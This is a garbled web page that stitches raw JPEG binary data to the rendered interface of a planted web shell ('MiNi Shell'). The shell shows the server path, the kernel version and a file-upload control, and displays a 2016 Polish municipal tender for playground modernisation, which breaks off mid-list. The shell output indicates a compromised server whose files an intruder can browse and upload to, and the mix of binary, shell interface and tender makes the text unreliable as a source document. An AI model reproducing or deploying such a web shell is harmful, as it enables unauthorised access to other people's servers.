JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160615/86549-N-2016.html

<p class="kh_header"><b>Stare Babice: Modernizacja zewnętrznych placów zabaw w Przedszkolu w Starych Babicach oraz Zespole Szkolno - Przedszkolnym w Borzęcinie Dużym</b><br>
<b>Numer ogłoszenia: 86549 - 2016; data zamieszczenia: 15.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stare Babice , Rynek 32, 05-082 Stare Babice, woj. mazowieckie, tel. 0-22 722 95 36, faks 0-22 722 95 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.stare-babice.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja zewnętrznych placów zabaw w Przedszkolu w Starych Babicach oraz Zespole Szkolno - Przedszkolnym w Borzęcinie Dużym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest modernizacja zewnętrznych placów zabaw w Przedszkolu w Starych Babicach oraz Zespole Szkolno Przedszkolnym w Borzęcinie Dużym.
2.Zamówienie zostało podzielone na 2 Części opisane poniżej:
1)Część nr 1 - Modernizacja palcu zabaw przy Przedszkolu w Starych Babicach przy ul. Polnej 40 - etap 2.
Uwaga! Wszystkie prace określone w dokumentacji projektowej dla etapu I zostały wykonane i nie stanowią one przedmiotu zamówienia niniejszego postępowania (w przypadku kiedy jakiekolwiek elementy prac I etapu zachowały się w dokumentacji projektowej w szczególności w przedmiarach Wykonawca musi je pominąć i nie uwzględniać przy wycenie oferty).
2)Część nr 2 - Modernizacja palcu zabaw przy Przedszkolu w Borzęcinie Dużym przy ul. Warszawskiej 697 - etap 2.
Uwaga! Wszystkie prace określone w dokumentacji projektowej dla etapu I zostały wykonane i nie stanowią one przedmiotu zamówienia niniejszego postępowania (w przypadku kiedy jakiekolwiek elementy prac I etapu zachowały się w dokumentacji projektowej w szczególności w przedmiarach Wykonawca musi je pominąć i nie uwzględniać przy wycenie oferty).
3.Przedmiot zamówienia opisany jest szczegółowo w Specyfikacji Istotnych Warunków Zamówienia oraz  w dokumentacji projektowej odrębnej dla każdej Części.
Przedmiot zamówienia obejmuje wykonanie dla każdej z części opisanych poniżej m. in. następujących robót budowlanych oraz czynności:
1)Dla Części 1:
demontaż elementów małej architektury;
wykonanie nawierzchni bezpiecznej (piaskowej) o powierzchni około 280 m2;
dostawę i montaż obrzeży gumowych prefabrykowanych około 26 m.b.;
wykonanie obrzeży elastycznych pomiędzy żywopłotem a placem zabaw około 47 m.b.;
zadaszenie istniejących piaskownic;
dostawę i montaż urządzeń zabawowych takich jak:
zjeżdżalnia,
zestaw zamek (wyposażony w: 4 wieże, mostek z sieci linowej, mostek stały lub ruchomy, przełaz rurowy, schody, 2 ścianki wspinaczkowe, rurę strażacką, przeplotnię liniową, zjeżdżalnie),
bujak deska surfingowa,
huśtawka ważka,
bujak trójosobowy,
bujak quad,
zestaw sprawnościowy 4 wieże (wyposażony w: 3 wieże zadaszone, 1 wieżę niezadaszoną, 2 mostki ruchome, drabinkę linową, przeplotnie linowe min 2szt., ściankę wspinaczkową, poręcz ześlizgową),
zestaw domek (wyposażony w: dach, pełne ściany z otworami okiennymi i drzwiowymi, stolik i ławę),
huśtawka wahadłową (podwójną),
rekultywację trawników o powierzchni ok. 30 m2,
uzyskanie certyfikatu zgodnie z obowiązującymi normami (w tym z grupy PN-EN 1176)  na wykonane prace i zamontowane urządzenia,
i)sporządzenie i przekazanie Zamawiającemu dokumentacji powykonawczej (wraz z certyfikatem na wykonane prace i zamontowane urządzenia) i inwentaryzacji geodezyjnej powykonawczej (Zamawiający dopuszcza, aby w dniu odbioru Wykonawca przedstawił szkice geodezyjne wraz z potwierdzeniem zgłoszenia złożenia inwentaryzacji geodezyjnej do kartowania w składnicy map a dostarczył ją po kartowaniu).
2)Dla Części 2:
a)demontaż elementów małej architektury;
b)wykonanie nawierzchni bezpiecznej (piaskowej) o powierzchni ok. 305 m2;
c)dostawę i montaż 2 ławek z oparciem;
d)dostawę i montaż urządzeń zabawowych takich jak:
zjeżdżalnia,
zestaw zamek (wyposażony w: 4 wieże, mostek z sieci linowej, 2 mostki stałe, mostek ruchomy, 2 ścianki wspinaczkowe, rurę strażacką, przeplotnię linową, zjeżdżalnię, częściowo pełne boki dolnych części wież),
zestaw sprawnościowy (wyposażony w: 4 słupy wspinaczkowe, przeplotnię linową, ściankę wspinaczkową, równoważnię z linką z ruchomym uchwytem, drabinkę poziomą, 2 drabinki skośne),
bujak trójosobowy;
huśtawka ważka.
e)uzyskanie certyfikatu zgodnie z obowiązującymi normami (w tym z grupy PN-EN 1176)  na wykonane prace i zamontowane urządzenia.
f)sporządzenie i przekazanie Zamawiającemu dokumentacji powykonawczej (wraz z certyfikatem na wykonane prace i zamontowane urządzenia) i inwentaryzacji geodezyjnej powykonawczej (Zamawiający dopuszcza, aby w dniu odbioru Wykonawca przedstawił szkice geodezyjne wraz z potwierdzeniem zgłoszenia złożenia inwentaryzacji geodezyjnej do kartowania w składnicy map a dostarczył ją po kartowaniu).
4.Warunki wykonania przedmiotu zamówienia (dla każdej z Części):
1)Wykonawca zobowiązuje się, przy wykonywaniu przedmiotu zamówienia, do odpowiedniej organizacji prac tak, aby zapewnić terminowe jej wykonanie.
2)Wykonawca zobowiązuje się do delegowania do prac związanych z realizacją przedmiotu zamówienia personelu posiadającego niezbędne doświadczenie, uprawnienia i kwalifikacje, w szczególności osób wskazanych w ofercie Wykonawcy.
3)Wykonawca zobowiązuje się, do dostarczenia urządzeń w kolorach zgodnych z kolorystyką urządzeń zamontowanych w 1 etapie.
4)Dostęp do miejsca wykonywania prac, lokalizację zaplecza budowy, miejsce składowania materiałów oraz sposób ich wygrodzenia i zabezpieczenia przed dostępem osób trzecich w szczególności dzieci należy uzgodnić z Użytkownikiem (Dyrektorem Przedszkola w Starych Babicach-Dyrektorem Zespołu Szkolno - Przedszkolnego w Borzęcinie Dużym).
5)Prowadzenie jakichkolwiek robót na terenie obiektów w szczególności w dni wolne od pracy, należy uzgodnić z z Użytkownikiem (Dyrektorem Przedszkola w Starych Babicach-Dyrektorem Zespołu Szkolno - Przedszkolnego w Borzęcinie Dużym)
6)Wykonawca we własnym zakresie zapewni sanitariaty przenośne celem korzystania z nich przez pracowników. Zamawiający nie dopuszcza korzystania z sanitariatów w budynkach. Lokalizację sanitariatów przenośnych należy ustalić z Użytkownikiem (Dyrektorem Przedszkola w Starych Babicach-Dyrektorem Zespołu Szkolno - Przedszkolnego w Borzęcinie Dużym).
7)Od momentu protokolarnego przejęcia terenu placu budowy aż do chwili zakończenia prac Wykonawca będzie ponosił odpowiedzialność na zasadach ogólnych za szkody wynikłe na tym terenie.
8)Wykonawca ponosi pełną odpowiedzialność za utrzymanie oznakowania i zabezpieczenie terenu budowy jak i jego zaplecza przed dostępem osób trzecich w szczególności dzieci, w trakcie prowadzenia swoich prac.
9)Woda i energia elektryczna na potrzeby robót budowlanych mogą być pobierane z istniejących przyłączy budynku po uprzednim opomiarowaniu i ustaleniu rozliczenia z Użytkownikiem (Dyrektorem Przedszkola w Starych Babicach-Dyrektorem Zespołu Szkolno - Przedszkolnego w Borzęcinie Dużym).
10)Zieleń znajdującą się w obrębie terenu budowy należy zabezpieczyć przed uszkodzeniem; rośliny zniszczone w trakcie prac budowlanych odtworzone zostaną przez Wykonawcę na jego koszt. W przypadku nie zastosowania się do powyższego zapisu Zamawiający może zlecić odtworzenie zieleni innemu wykonawcy na koszt i niebezpieczeństwo Wykonawcy.
11)W przypadku uszkodzenia jakichkolwiek części budynków, urządzeń infrastruktury technicznej lub innych elementów na terenie obiektów Wykonawca powiadomi natychmiast o zaistniałym fakcie Zamawiającego i Użytkownika oraz zobowiązuje się do naprawy uszkodzenia według wytycznych i w uzgodnieniu z Użytkownikiem. W przypadku nie zastosowania się do powyższego zapisu Zamawiający może zlecić usunięcie usterek innemu wykonawcy na koszt i niebezpieczeństwo Wykonawcy.
12)Ze względu na przebieg robót na czynnym obiekcie Wykonawca musi zapewnić bezpieczeństwo robót budowlanych i zagospodarowania placu budowy w trakcie robót. Dla zapewnienia bezpieczeństwa użytkowników obiektów, Zamawiający wymaga w zależności od potrzeb wyznaczenia dróg tymczasowych.
13)Wykonawca będzie ponosił koszty utrzymania oraz konserwacji urządzeń i obiektów tymczasowych na terenie budowy
14)W trakcie wykonywania robót związanych z budową, prace należy prowadzić w taki sposób aby nie kolidowały one z normalną pracą szkoły lub przedszkola.
15)Wykonawca odpowiada za bezpieczeństwo przy wykonywaniu przedmiotu zamówienia, a w szczególności za bezpieczne warunki poruszania się pojazdów oraz pieszych w obrębie wykonywanych robót.
16)Wykonawca systematycznie, (co najmniej raz w tygodniu, w zależności od sytuacji) i na własny koszt będzie usuwał z terenu budowy wszelkie odpady komunalne, gruz oraz inne odpady budowlane, celem zapewnienia porządku. W przypadku nie zastosowania się do powyższego zapisu Zamawiający może zlecić ich usunięcie innemu wykonawcy na koszt i niebezpieczeństwo Wykonawcy.
17)Należności za roboty zlecone przez Zamawiającego innemu wykonawcy na koszt i niebezpieczeństwo Wykonawcy będą potrącane z faktury Wykonawcy, na co Wykonawca wyraża zgodę.
18)Za jakość zastosowanych materiałów i wykonywanych robót odpowiedzialny jest Wykonawca.
19)Wykonawca ponosi całkowitą odpowiedzialność cywilnoprawną za straty i szkody powstałe w związku z wypełnianiem przez Wykonawcę obowiązków wynikających z niniejszego zamówienia a nadto za szkody wyrządzone osobom trzecim na skutek lub w trakcie wykonywanych prac.
20)Wykonawca ponosi całkowitą odpowiedzialność cywilnoprawną za straty i szkody powstałe w związku z wypełnianiem przez podwykonawcę obowiązków wynikających z niniejszego zamówienia.
21)Wady ujawnione w czasie odbioru oraz wszelkie naprawy gwarancyjne będą usunięte w terminie wyznaczonym przez Zamawiającego.
22)Po zakończeniu prac Wykonawca zobowiązuje się uporządkować teren placu budowy i przekazać go Zamawiającemu w dniu odbioru. W przypadku niezastosowania się do powyższego zapisu Zamawiający może zlecić uporządkowanie terenu innemu wykonawcy na koszt i niebezpieczeństwo Wykonawcy. 
23)Zakończenie prac zostanie potwierdzone protokołem odbioru podpisanym przez Zamawiającego i Wykonawcę.
24)Wykonawca ponosi odpowiedzialność od następstw i za wyniki działalności w zakresie:
a)organizacji i wykonywania prac,
b)zabezpieczenia interesów osób trzecich,
c)ochrony środowiska,
d)warunków bezpieczeństwa i higieny pracy,
e)organizacji i utrzymywania zaplecza budowy,
f)bezpieczeństwa ruchu pieszego w otoczeniu budowy,
g)ochrony mienia związanego z prowadzeniem prac.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dla każdej z Części przewiduje zamówienia uzupełniające w wysokości do 20% zamówienia podstawowego polegające na rozszerzeniu tego samego rodzaju dostaw, co w zamówieniu podstawowym, a zmiana wykonawcy powodowałaby konieczność nabywania rzeczy o innych parametrach technicznych, co powodowałoby niekompatybilność techniczną lub nieproporcjonalnie duże trudności techniczne w dozorze i użytkowaniu</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę (każdą z Części, na którą składa ofertę) wadium w wysokości:
Część 1 - 3 000 zł (słownie: trzy tysiące zł),
Część 2 - 2 000 zł (słownie: dwa tysiące zł),
w formie określonej w SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego w niniejszym postępowaniu mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące posiadania wiedzy i doświadczenia, tj. o niniejsze zamówienie może ubiegać się Wykonawca, który w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej 2 zadania polegające na wykonaniu placu zabaw (dostawie i montażu urządzeń zabawowych) o wartości min. 90.000 zł brutto każde (2 zadania niezależnie od ilości części, o które ubiega się wykonawca);
Zgodnie z art. 26 ust. 2 b Ustawy Prawo zamówień publicznych, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Spełnienie warunku udziału w postępowaniu posiadania wiedzy i doświadczenia należy wykazać w następujący sposób:
W przypadku spełnienia warunku udziału w postępowaniu posiadania wiedzy i doświadczenia Zamawiający nie dopuszcza sumowania (łączenia) zasobów dotyczących posiadanej wiedzy i doświadczenia przez 2 lub więcej podmiotów, co oznacza, iż co najmniej jeden z tych podmiotów samodzielnie wykaże spełnienie w całości tego warunku;
W przypadku udostępnienia Wykonawcy zasobu wiedzy i doświadczenia przez inny podmiot spełnienie warunku musi wykazać podmiot udostępniający zasób;
W przypadku, gdy Wykonawca wykazując spełnienie warunku udziału w postępowaniu posiadania wiedzy i doświadczenia polegał będzie na doświadczeniu innych podmiotów, jedynym sposobem wykorzystania tych zasobów tych podmiotów (tj. wiedzy i doświadczenia) jest rzeczywisty udział tych podmiotów w realizacji zamówienia np. zatrudnienie tych podmiotów do realizacji zamówienia, jako podwykonawców lub udział w konsorcjum;
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie załączonych do oferty wymaganych dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego w niniejszym postępowaniu mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące
dysponowania osobami zdolnymi do wykonania zamówienia tj. o niniejsze zamówienie może ubiegać się Wykonawca, który wykaże, że dysponuje lub będzie dysponował kierownikiem budowy posiadającym uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w co najmniej ograniczonym zakresie lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które upoważniają do pełnienia tych funkcji w ramach robót związanych z budową placu zabaw (w tym wykonaniem fundamentów pod urządzenia zabawowe); (Wykonawca musi dysponować jednym kierownikiem robót niezależnie od ilości części, o które się ubiega);
Zgodnie z art. 26 ust. 2 b Ustawy Prawo zamówień publicznych, Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia na podstawie załączonych do oferty wymaganych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje tego warunku, ocena spełnienia tego warunku zostanie dokonana na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu przez Wykonawcę warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kompletna oferta musi zawierać:
1)Ofertę Wykonawcy,
2)Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru,
3)W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, dotyczy również spółek cywilnych, o ile stosowne zapisy nie wynikają z treści umowy spółki,
4)Kopię dowodu wniesienia wadium,
5)Formularz nr 4 Urządzenia równoważne,
6)Pozostałe dokumenty wymienione w pkt. 9, 10, 11 SIWZ,
7)Pisemne wyjaśnienie w przypadku zastrzeżenia informacji stanowiących tajemnicę przedsiębiorstwa.
Zamawiający prosi o dołączenie Formularza nr 1 - Dane Ogólne, spisu treści i ponumerowanie wszystkich zapisanych stron oferty. Strony zawierające informacje niewymagane przez Zamawiającego (np.: prospekty reklamowe o firmie, jej działalności, itp.) nie muszą być numerowane i parafowane</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.95</li>
<li>2 - Rękojmia za wady - 0.05</li>
